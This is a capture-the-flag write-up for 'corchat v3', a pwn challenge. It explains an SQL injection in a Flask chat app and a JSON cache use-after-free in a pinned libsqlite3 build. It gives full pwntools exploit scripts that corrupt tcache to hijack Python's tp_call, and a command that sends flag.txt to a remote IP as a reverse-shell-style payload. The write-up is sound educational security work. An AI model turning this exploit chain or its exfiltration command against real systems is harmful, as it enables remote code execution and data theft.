corchat v3

Introduction

corchat v3 was one of the (many) brainfuck pwn challenges from this CTF, and was the challenge I focused on during the event (gotta get that $50). Unfortunately I didn't solve it during the event, and someone beat me to it anyways. I did however manage to figure out most of how it worked after the event (with some reference to the author's solution). Anways, let's jump in.

Reversing

As the name implies, the target is a chatting application, which we're given the following source code for:

from flask import Flask, request, g, render_template, redirect
from flask_socketio import SocketIO
import sqlite3

app = Flask(__name__)
socketio = SocketIO(app)
app.config["DATABASE"] = "chat.db"

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(app.config['DATABASE'])
    return db

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route("/")
def index():
    return redirect("/chatroom")

@app.route("/chatroom", methods=["GET"])
def chatroom():
    return render_template("chatroom.html")

@app.route("/send_message", methods=["POST"])
def post_new_message():
    message = request.form.get("msg")
    if message == None or len(message) == 0:
        return "Invalid request"

    db = get_db()
    s = f"INSERT INTO messages (message) VALUES ('{message}')"
    db.cursor().execute(s)
    db.commit()

    data = {"msg": message}
    socketio.emit("recv_message", data)
    return "Success"

@socketio.on("connect")
def handle_new_connection():
    cursor = get_db().cursor()
    s = f"SELECT message FROM messages"
    cursor.execute(s)

    messages = cursor.fetchall()
    for message in messages:
        data = {"msg": message[0]}
        socketio.emit("recv_message", data, to=request.sid)

@socketio.on("new_message")
def handle_new_message(data):
    message = data["msg"]
    if message == None or len(message) == 0:
        return

    db = get_db()
    s = f"INSERT INTO messages (message) VALUES ('{message}')"
    db.cursor().execute(s)
    db.commit()

    socketio.emit("recv_message", data)

if __name__ == "__main__":
    socketio.run(app, host="0.0.0.0", port=5000, debug=False)

The app is fairly simple:

  • A user can send a message (handled by handle_new_message), which is stored to a sqlite database using an INSERT statement.

  • A user connecting to the server (handled by handle_new_connection) will receive all the messages currently in the database.

SQL injection

The first vulnerability is fairly easy to spot:

s = f"INSERT INTO messages (message) VALUES ('{message}')"
db.cursor().execute(s)

When inserting the message into the database, it's inserted directly into the statement using string formatting, instead of something like prepared statements, without checking the contents of the message or escaping problematic characters. This is a classic SQL injection.

Unfortunately we can't use it for an RCE in this case, and it's not like the flag (or anything useful) is in the database. So what on earth is this useful for?

Where's the pwn?

The app is written in python, so it's not like the app itself can have any memory corruption bugs either, so what gives? Isn't this meant to be a pwn challenge???

Well upon closer inspection of the Dockerfile, we notice something interesting.

RUN git clone https://github.com/sqlite/sqlite && \
    cd sqlite && \
    git checkout 66dacae4c3f818d0a9e94ecb4433c823a69a98aa && \
    ./configure && \
    make && \
    cp .libs/libsqlite3.so.0.8.6 /usr/lib/x86_64-linux-gnu/

While most of the installs are normal, this one stands out, because it's compiling its own very specific version of libsqlite3 using a commit hash. So, what if there was a vulnerability in this version of libsqlite3? Well the python library wouldn't be implementing all the logic itself, it would instead reuse existing code, which would come from libraries like libsqlite3, so a vulnerability here would also be a vulnerability in python's sqlite3, thus our application. And since we have SQL injection, we can pass arbitary SQL commands, so we'd have a decent amount of control in this hypothetical attack scenario.

Let's first look at this commit:

git clone https://github.com/sqlite/sqlite
cd sqlite
git checkout 66dacae4c3f818d0a9e94ecb4433c823a69a98aa
git log

Having a brief look at the current commit didn't ring any alarm bells. But what if there was a vulnerability that was reported and fixed in a later commit. Well scrolling up to the next commit reveals something very appealing:

git log --reverse --all --ancestry-path ^HEAD

A potential UAF you say :eyes:. Commit faef28e6bd654e5061561423cb1ece6ca84f1f1f includes a patch for the issue:

@@ -2902,6 +2902,7 @@ static void jsonReplaceFunc(
   }
   pParse = jsonParseCached(ctx, argv[0], ctx, argc>1);
   if( pParse==0 ) return;
+  pParse->nJPRef++;
   for(i=1; i<(u32)argc; i+=2){
     zPath = (const char*)sqlite3_value_text(argv[i]);
     pParse->useMod = 1;
@@ -2914,6 +2915,7 @@ static void jsonReplaceFunc(
   jsonReturnJson(pParse, pParse->aNode, ctx, 1);
 replace_err:
   jsonDebugPrintParse(pParse);
+  jsonParseFree(pParse);
 }
 
 
@@ -2948,6 +2950,7 @@ static void jsonSetFunc(
   }
   pParse = jsonParseCached(ctx, argv[0], ctx, argc>1);
   if( pParse==0 ) return;
+  pParse->nJPRef++;
   for(i=1; i<(u32)argc; i+=2){
     zPath = (const char*)sqlite3_value_text(argv[i]);
     bApnd = 0;
@@ -2964,9 +2967,8 @@ static void jsonSetFunc(
   }
   jsonDebugPrintParse(pParse);
   jsonReturnJson(pParse, pParse->aNode, ctx, 1);
-
 jsonSetDone:
-  /* no cleanup required */;
+  jsonParseFree(pParse);
 }

At first glance, one can assume that there's a UAF occuring due to the pParse object's reference count not being incremented, causing it to be incorrectly freed. But what is this talk about a JSON parser cache spill?

We've also been given some test cases which would supposedly trigger the bug:

# 2023-10-09 https://sqlite.org/forum/forumpost/b25edc1d46
# UAF due to JSON cache overflow
#
do_execsql_test json101-22.1 {
  SELECT json_set(
    '{}',
    '$.a', json('1'),
    '$.a', json('2'),
    '$.b', json('3'),
    '$.b', json('4'),
    '$.c', json('5'),
    '$.c', json('6')
  );
} {{{"a":2,"b":4,"c":6}}}
do_execsql_test json101-22.2 {
  SELECT json_replace(
    '{"a":7,"b":8,"c":9}',
    '$.a', json('1'),
    '$.a', json('2'),
    '$.b', json('3'),
    '$.b', json('4'),
    '$.c', json('5'),
    '$.c', json('6')
  );
} {{{"a":2,"b":4,"c":6}}}

Let's try them out in the docker.

And that right there, is the pwn we've been looking for.

sqlite3 and JSON

So at the moment we know there's a UAF in the json_set and json_replace functions, but what are these functions?

json_set takes a json object and key-value pairs, and assigns each pair to the json object (json[key] = value]).

json_replace is similar, but only sets the value if the key exists in the object.

From what I could see, there doesn't seem to be a proper JSON object type in sqlite, rather they take and return strings representing JSON objects, which you can see in the test cases as well. This means they need to parse the JSON string every time it's used.

For this writeup we'll focus on json_set, but note that you could most likely also do this challenge using json_replace (or json_insert).

json_set

json_set is implemented with jsonSetFunc (bet you didn't see that coming).

We see that a function called jsonParseCached is used to generate the pParse object we saw earlier which, based on the name, we can assume would parse the JSON string, but also keeps a cache to speed up parsing, which makes sense as a JSON string would have to be parsed each time one was used. Also the bug description described a cache spill/overflow, so I wonder if this has anything to do with it. Foreshadowing is a literary device in wh-

After parsing the JSON it pretty much does what you'd expect:

  • Lookup the key to get the value pNode (if it doesn't exist a null slot is allocated by jsonLookup).

  • The value pNode is replaced by the new value with jsonReplaceNode.

You may have also noticed the bIsSet ? "set : "insert", which is because this function can also implement json_insert. We don't need to worry about the extra logic that this brings as we don't use it here.

struct JsonParse

Ths is the type of the object pParse, which represents a parsing of the JSON string, not a typical JSON object you might be picturing which has a list of key-value pairs or a hash table. Think of it more like an AST (Abstract Syntax Tree).

It stores the JSON string that the parse came from and a list of nodes in aNode, which can have multiple types:

  • OBJECT/ARRAY: These refer to {}/[] respectively, and store the total number of nodes contained in the object/array, which directly follow this object.

  • STRING/INT/REAL: These contain pointers into the main JSON string referring to the string/int/real, plus the length.

  • NULL: Represents a null.

jsonParseCached

jsonParseCached is a bit confusing at first, because there's a lot of logic relating to caching that we don't need to worry about too much (particularly regarding whether the JSON is allowed prior edits), so I'll just cover the essentials.

Since an sqlite object is passed, we need to extract the raw char* in zJson and the size in nJson.

Then it iterates through all the possible entries in the JSON parser cache. sqlite stores these in a singly linked list along with other auxillary data allocations (accessed by sqlite3_get_auxdata). Since they're lumped in with other types of allocations, they're uniquely identified by giving them a set of keys that are only used by JSON parse objects, starting at JSON_CACHE_ID, and containing JSON_CACHE_SZ (4) keys.

If a slot is missing, it's marked using iMinKey, which is used later as the slot to store a new JsonParse object.

A slot can also be marked using iMinKey if it's been in the cache too long. This is implemented using numbers representing the iHold of an object. The object with the lowest iHold will be removed, and new objects are marked with the highest iHold out of the currently cached items.

It's easier to think of it like a FIFO queue: An object is inserted into the cache, and as more objects are inserted, the original one is pushed to the end, where it's eventually dequeued to make room for the next one.

A JSON string is matched to cache entry typically by comparing the JSON strings using memcmp. There is more logic relating to this, but it's not that important for our purposes here.

Above is how a new JsonParse object is created if a cached one couldn't be found. While most of this isn't too important, there are some details which are interesting to note:

  • Line 1959: The reference count is set to 1.

  • Line 1963: This is a case where jsonParse failed, and there's a comment that the caller will own the new JsonParse object. If that's what happens in the case of an error, what happens normally?

  • Line 1971: Well see that it's actually the cache that owns the object, not the caller. Hmmm...

  • Line 1972: The object is stored to the cache using sqlite3_set_auxdata, at iMinKey, with the destructor jsonParseFree. If it's replacing an entry that already exists, then the existing entry is freed using its destructor.

The destructor in question behaves how you might expect:

Decrements the reference count until it's 1, in which case free it.

This idea of the cache owning the object is also elaborated on in a comment above:

And if you remember what the patch was, it was jsonSetFunc incrementing the reference count themselves, effectively also taking ownership of the object. So clearly something went wrong with this idea, and they seemingly had to backtrack a bit to fix it.

So to summarise:

  • JsonParse objects are cached in a queue of size 4.

  • It will attempt to find a cached entry before making a new one.

  • If one can not be found, a new one will be made.

  • This new one is added to the queue, potentially forcing another existing entry out of the queue, causing it to be freed.

  • All entries belong to the cache and have a reference count of 1, which are unchanged by jsonSetFunc and jsonReplaceFunc.

jsonReplaceNode

Let's have a closer look at how the value node is replaced in json_set. Remember that jsonSetFunc uses jsonLookup (exact details of how this works aren't important) to find a node for the value corresponding to the key, and if the key doesn't already exist, allocate a NULL node for the value of this new key, and use that.

The way replacing a node works is basically by allocating a SUBST node that references the node to be replaced, but the details of this aren't necessary here. Then there's a switch case depending on the type of the sqlite object, so it can handle each type separately. Let's look at the TEXT case.

There's a lot going on here, but it really comes down to 2 separate cases:

  • sqlite3_value_subtype(pValue) != JSON_SUBTYPE

  • sqlite3_value_subtype(pValue) == JSON_SUBTYPE

What does it mean for a pValue to be have JSON_SUBTYPE. Well, while there isn't a JSON object type per se, there is a distinction between strings that came from JSON functions like json, json_set etc. These are marked as having the subtype JSON_SUBTYPE by jsonReturnJson, which is used by most of the JSON related functions.

So for example the string "hello world" would not be considering a JSON subtype, but json("hello world") would. And if you remember the test cases once again, they used strings in calls to json. Why is that important?

Well, if we have a closer look at the JSON_SUBTYPE case:

There's a call to jsonParseCached, which would make sense, considering that it expects this to be a JSON string. Harmless, right?

The UAF

Well let's go back to jsonParseCached. We know that it either returns a JsonParse from the cache, or creates a new one ands adds it to the cache. Either way, a JsonParse from jsonParseCached will belong to the cache. That would include the original JsonParse all the way back in jsonSetFunc.

We also know that jsonParseCached can push old objects out of the cache, causing them to be freed using jsonParseFree. This could also include the original JsonParse from jsonSetFunc!

This on its own isn't a problem, but considering the fact that the object would only belong to the cache, this is now a problem, because when it's freed by jsonParseFree, it would see that the reference count is 1, so it believes that nothing else is using it (only the cache is), so it's safe to free it!

But of course, it is in use, in jsonSetFunc, so this causes a UAF!

Walking this through with the (slightly modified) test case:

SELECT json_set(
    '{}',
    '$.a', json('1'),
    '$.b', json('2'),
    '$.c', json('3'),
    '$.d', json('4')
)
  1. All the json function calls are evaluated. These would just return the strings themselves, but they'd be marked as JSON_SUBTYPE. (They would be parsed and cached, but this doesn't affect much, except clear the previous cache).

  2. The '{}' would be parsed and cached by jsonParseCached, placing it at the back of the queue.

  3. The '$.a' key is looked up, and the null value would be replaced by '1'. Since it has JSON_SUBTYPE, it's parsed and cached, pushing '{}' 1 slot along.

  4. Repeat for '$.b' and '$.c'.

  5. By now, the original '{}' is at the end of the queue, so when '4' is parsed and cached, it forces '{}' to be dequeued and freed, resulting in a UAF.

So what now?

Right now, we have the DOS like the description mentioned, now for the RCE. But how?

Well first we need to control what happens right after the UAF is created to prevent a crash. So what happens next?

Well after the parsing the value that needs to be added to the object, it needs to then add the nodes corresponding to that value. It does this with jsonParseAddNodeArray.

Remember at this point, the pParse object has been freed, which would corrupt some of the first fields of the object, depending on what bin it was freed to. By debugging, we can verify that it (usually) gets freed to tcache.

I debugged it by following these instructions:

  1. Running python or python app.py

  2. Running gdbserver :9090 --attach $(pidof python3) in another shell

  3. Running gdb -> target remote 127.0.0.1:9090 in another another shell

Here we see it's been freed specifically to tcachebins[0x60], which makes sense since we're on glibc 2.31, plus the size of the JsonParse structure is 0x50 bytes (+ a few more from storing '{}'). And from the structure dump, we see that the tcache key (a pointer to tcache_perthread_struct) overlaps with aNode, which is a pointer to the list of nodes making up the JsonParse.

This is interesting, because now we're in jsonParseAddNodeArray, which is about to copy a new set of nodes to aNode if there's room, and if there isn't, it will realloc it.

Theoretically this could allow arbitrary control over tcache_perthread_struct, but there a few problems currently:

  1. An array of JsonNodes isn't very good for controlling data, as we don't have much control over these. This means that not only is it bad for arbitrary control, but by clobbering tcache, it'll likely cause a crash in some malloc call.

  2. realloc'ing tcache to a smaller size also clobbers it, as a new size field will show up in the middle of tcache.

  3. nNode and nAlloc are also overwritten by the fd, so if there's a pointer overlapping this, these fields will be very large and likely result in a crash.

The 3rd problem can be fixed by using a spray to empty tcachebins[0x60] beforehand, that way the fd field will be NULL.

The 1st and 2nd problem we can solve by realloc'ing with a size larger than 0x290 (the size of tcache_perthread_struct). If a realloc call is passed a larger size than the current size of the chunk, and can't expand forward, it'll resort to just:

  1. malloc'ing a new, larger chunk.

  2. Copying over the data to the new chunk.

  3. free'ing the old chunk.

This would allow us to perform a House of Spirit attack on tcache_perthread_struct, and if we could allocate on top of that with controlled data, we can get an arbitrary write.

Data Spraying

For this we'd need a way of spraying controlled data, and this is where I started to struggle, as I was unable to find such a primitive. It turns out the answer was held by another JSON function.

After the CTF, I saw that ryaagard (the challenge author) revealed how they were able to spray data.

This was rather annoying, because if I just kept looking at src/json.c I probably could've found it, but oh well.

json_extract takes a JSON string and a key, extracts the value corresponding to the provided key, and returns it. It's implemented by jsonExtractFunc, and the key part that makes this possible is jsonReturn.

Specifically the JSON_STRING case, and when the string contains escape sequences (signified by jnFlags & JNODE_RAW == 0 && jnFlags & JNODE_ESCAPE != 0), it will malloc a chunk that's the same length as the escaped sequence, to ensure that there's no possibility of an overflow, as an escaped character will be longer than the character itself. It then goes on to unescape the sequence, making it very useful for a data spray. Although it should be noted that you can't control every single byte in a "chunk" you allocate, due to how the malloc'ed size will be larger than the unescaped size.

We can also use this to spray tcachebins[0x60] to empty it.

To ensure these data sprays are preserved (i.e. not freed), we can use a sequence of SELECT json_extract(...) statements joined by UNION. I tried other ways of creating these sprays, such as string concatentation, or store them in a list, but both of these methods failed, likely because the strings would only be needed temporarily, and thus be freed (e.g. in concatenation of 2 strings, neither of them are needed again after the concatenation as they make a new, longer string). It seems that UNION keeps them around however, perhaps because it only combines the results at the very end.

Smashing tcache

Let's put all of this together into a POC which overwrites tcache with junk.

from pwn import *
import string

request2size = lambda req: (req+0x17)&(~0xf) if req>=9 else 0x20
size2usable = lambda sz: sz-8

def escape_byte(c, force=False):
	charset = set(string.printable.encode())
	charset -= set(string.whitespace.encode() + b"'\"")
	if not force:
		if c == 0:
			return "\\0"
		elif c in charset:
			return chr(c)
	return "\\x"+format(c, "02x")

def escape(x):
	return "".join(map(escape_byte, x))

def malloc_escaped(escaped):
	# at least one character should be escaped to trigger the malloc
	assert "\\" in escaped
	return "SELECT json_extract('{a:\"%s\"}', '$.a')" % escaped

def spray(size, char="A"):
	assert size & 0xf == 0
	x = escape_byte(ord(char), force=True)
	x = x.ljust(size2usable(size)-2-1, char)
	return malloc_escaped(x)
	

# use json_extract with escaped strings to spray
to_spray = [
(0x60, 7),
(0x290, 7),
]
sprays = []
char = 0x41
for size, count in to_spray:
	for _ in range(count):
		sprays.append(spray(size, char=chr(char)))
		char += 1

malloc_tcache = spray(0x290, char="X")

long_list = "[" + ",".join(["null"]*0x30) + "]"
json = f"json_set('{{}}', '$.a', json('1'), '$.b', json('2'), '$.c', json('3'), '$.d', json('{long_list}'))"

statements = []
statements.extend(sprays)
statements.append("SELECT " + json)
statements.append(malloc_tcache)

injection = " UNION ".join(["aaaa')"] + statements) + "--"
print(injection)

statement = f"INSERT INTO messages (message) VALUES ('{injection}')"
print(f"db.cursor().execute({repr(statement)})")

We start off by spraying chunks to empty:

  • tcachebins[0x60]: This will be used for the UAF'ed chunk, so we need fd to be NULL.

  • tcachebins[0x290]: Ensure that when we free tcache_perthread_struct, it gets freed to tcache, which makes it easier to reallocate. We don't need to fully empty it (1 slot would work just fine), but we might as well, just to be sure we'll get a slot (plus nothing's stopping us).

Then we trigger the UAF using a modified version of the test case. The change is that we use a list longer than 0x29 elements, to ensure that its aNode array is bigger than 0x290 bytes (sizeof(JsonNode)=0x10), which forces realloc to free tcache_perthread_struct.

Finally we reclaim the allocation with a dummy.

We can test this as follows:

ctf@0ac532cec93d:/app$ python3
Python 3.8.10 (default, Mar 25 2024, 10:42:49) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import sqlite3
>>> db = sqlite3.connect("chat.db")
>>> db.cursor().execute(...)

Bingo!

Write what where

Now that we have control over tcache_perthread_struct, what can we do with that? ASLR is in place, and turning this into a leak wouldn't be possible, so is there anything we can target? Yes there is, because thankfully the python binary is compiled without PIE:

So what can we target here?

Well one idea that I had was targetting the GOT, but this doesn't work for a very annoying reason: sqlite3_malloc. This is a wrapper around malloc that does some locking and memory tracking. Part of that memory tracking is counting how many total bytes have been malloc'ed, and to do this it uses malloc_usable_size.

So with our allocations we have to be careful: if we use a size that's too big (like an address) we'll get a crash, because part of determining the usable size is finding whether the next chunk's prev_inuse bit is set, so finding the next chunk based on a large size wanders into no man's land.

So GOT is a no-go. I also considered possibly targetting a python class method. When a class method is called, it's typically done so with the first argument being the object itself (like a thiscall). So if we could write a command to the start of the object, then overwrite a class method to system@plt, we could get RCE. I didn't find a way to do this, especially since most objects are on the heap, which we can't access. And while there some objects we can access in _PyRuntime, it's still not ideal because we need to use a reverse shell command, which we can't fit inside 8 bytes (at offset +0x08 is the pointer to the class object).

So I conceded and looked at ryaagard's solution, and this is what I understood of it:

One gadgets in python?

The first trick used employed by ryaagard was PyMem_RawFree.

The PyMem_Raw set of allocation functions use a context object to store function handlers. It first loads the function into rax, and if it's some specific function (which is a no-op function):

Then it uses the regular free. Otherwise, it will jump to it, with the first argument being some object from the same context object. This is very appealing, because if we can smash this context object, then any call to it will execute an arbitrary function (like system@plt) with a controlled first argument (like a reverse shell). This effectively turns PyMem_RawFree into a constraintless one_gadget.

So we'll need 2 writes:

  • Write a reverse shell command into memory.

  • Smash the PyMem_Raw context.

Overwriting a class method

Now that we have a one_gadget, we can overwrite any class method, and if it's ever called, we'll get a reverse shell. ryaagard opted to overwrite PyFunction_Type, which is the object representing the python function type. It stores fields, like function pointers, which handle different functionalities of function objects. One of these is tp_call, which handles calling functions . This is an ideal target, because there will be many instances where a python function would be called, and all it takes is one of these calls to happen to give us a reverse shell. However, by default tp_call isn't actually used, so we can't just overwrite it and call it a day. Let's have a closer look:

Searching for references of tp_call yields _PyObject_MakeTpCall:

Which, as you might expect, goes on to call the function:

All seems good, so where is this (and tp_call in general) used? The 2 main instances I found were:

Both of which are used by PyEval_CallObjectWithKeywords:

In both of these cases, we can see a common thread: _PyVectorcall_Function is used to determine whether or not to use tp_call. It seems like this has to return NULL for python to decide to use tp_call, so how do we do that?

It turns out that it checks for feature VECTORCALL, by checking the tp_flags field of the class, and seeing whether the _Py_TPFLAGS_HAVE_VECTORCALL (1<<11) flag is set. If it's disabled (i.e. flag isn't set), then it resorts to tp_call.

We can determine, by looking at the _typeobject struct definition, that the offsets we need are:

  • 0x80: tp_call (= PyMem_RawFree)

  • 0xa8: tp_flags (= 0)

More crashes

We also have another problem of triggering tp_call. This because another snag which is the fact that at the end of executing the SQL statement, like a reasonable application which wants to avoid memory leaks (lame), it frees all the memory it allocated previously, including our arbitrary allocations. When freeing these, the process will abort because they're obviously malformed "chunks", so we never actually reach the python part of the thread we corrupt, meaning our corrupted data isn't used by this thread.

Fortunately, the web application is multithreaded, and share all the same memory, so while the current thread may abort, another thread may want to call a python function, and will use our corrupted tp_call, before the application can abort. So ideally we'd need to stall our thread from aborting, to give us time for the application to trigger our reverse shell.

While sqlite doesn't have any kind of SLEEP statement, we can use an SQL statement that would take a while to evaluate, which are also commonplace in SQL time-based injections. So we can use something like the following:

SELECT 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2))))

Solution

So finally, putting all of this together, we can finally produce the following exploit:

from pwn import *
import string

python = context.binary = ELF("python3.8")

IP, PORT = '[insert ip here]',9999

request2size = lambda req: (req+0x17)&(~0xf) if req>=9 else 0x20
size2usable = lambda sz: sz-8

def escape_byte(c, force=False):
	charset = set(string.printable.encode())
	charset -= set(string.whitespace.encode() + b"'\"")
	if not force:
		if c == 0:
			return "\\0"
		elif c in charset:
			return chr(c)
	return "\\x"+format(c, "02x")

def escape(x):
	return "".join(map(escape_byte, x))

def malloc_escaped(escaped):
	# at least one character should be escaped to trigger the malloc
	assert "\\" in escaped
	return "SELECT json_extract('{a:\"%s\"}', '$.a')" % escaped

def spray(size, char="A"):
	assert size & 0xf == 0
	x = escape_byte(ord(char), force=True)
	x = x.ljust(size2usable(size)-2-1, char)
	return malloc_escaped(x)
	

# use json_extract with escaped strings to spray
to_spray = [
(0x60, 7),
(0x290, 7),
]
sprays = []
char = 0x41
for size, count in to_spray:
	for _ in range(count):
		sprays.append(spray(size, char=chr(char)))
		char += 1

def pad_to_size(escaped, sz):
	return escaped + "\\x00" * ((sz-0x10-len(escaped))//4)

def malloc(data, sz):
	data = escape(data)
	assert request2size(len(data)+2+1) <= sz
	data = pad_to_size(data, sz)
	return malloc_escaped(data)

tcache = {}

# put cmd in memory

# 0x93d900 <_PyRuntime+672>
scratch = 0x93d900

sz = 0x100
cmd = f"python3 -c \"import socket;s=socket.socket();s.connect(('{IP}',{PORT}));s.send(open('flag.txt','rb').read());s.close()\""
cmd = cmd.encode() + b"\x00"
malloc_cmd = malloc(cmd, sz)

tcache[sz] = scratch

# overwrite _PyMem_RawFree

sz = 0x70
pymem_overwrite = flat({
	0x00: scratch,
	0x20: python.plt.system,
})
malloc_pymem_overwrite = malloc(pymem_overwrite, sz)

tcache[sz] = 0x90b5e0

# overwrite PyFunction_Type->tp_call

sz = 0x80
# we need to allocate 0x10 bytes earlier to prevent a musable() crash
tpcall_overwrite = flat({
	0x10: python.sym.PyMem_RawFree,		# tp_call
	0x38: 0								# tp_flags
})
malloc_tpcall_overwrite = malloc(tpcall_overwrite, sz)

tcache[sz] = 0x8fba30	# PyFunction_Type+112

# construct tcache

tcache_sizes = b""
tcache_ptrs = b""
for sz in range(0x20, 0x420, 0x10):
	if sz in tcache:
		tcache_sizes += p16(1)
		tcache_ptrs += p64(tcache[sz])
	else:
		tcache_sizes += p16(0)
		tcache_ptrs += b"X"*8
tcache = tcache_sizes + tcache_ptrs
tcache = escape(tcache)[:0x280]
malloc_tcache = malloc_escaped(tcache)

long_list = ("[" + ",".join(["null"]*0x30)) + "]"
json = f"json_set('{{}}', '$.a', json('1'), '$.b', json('2'), '$.c', json('3'), '$.d', json('{long_list}'))"

statements = []
statements.extend(sprays)
statements.append("SELECT " + json)
statements.append(malloc_tcache)
statements.append(malloc_cmd)
statements.append(malloc_pymem_overwrite)
statements.append(malloc_tpcall_overwrite)
statements.append("SELECT 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2))))")

injection = " UNION ".join(["aaaa')"] + statements) + "--"
print(injection)

To receive the reverse shell I chose to spin up a digitalocean instance, and setup a netcat listener. Let's fire away!

Last updated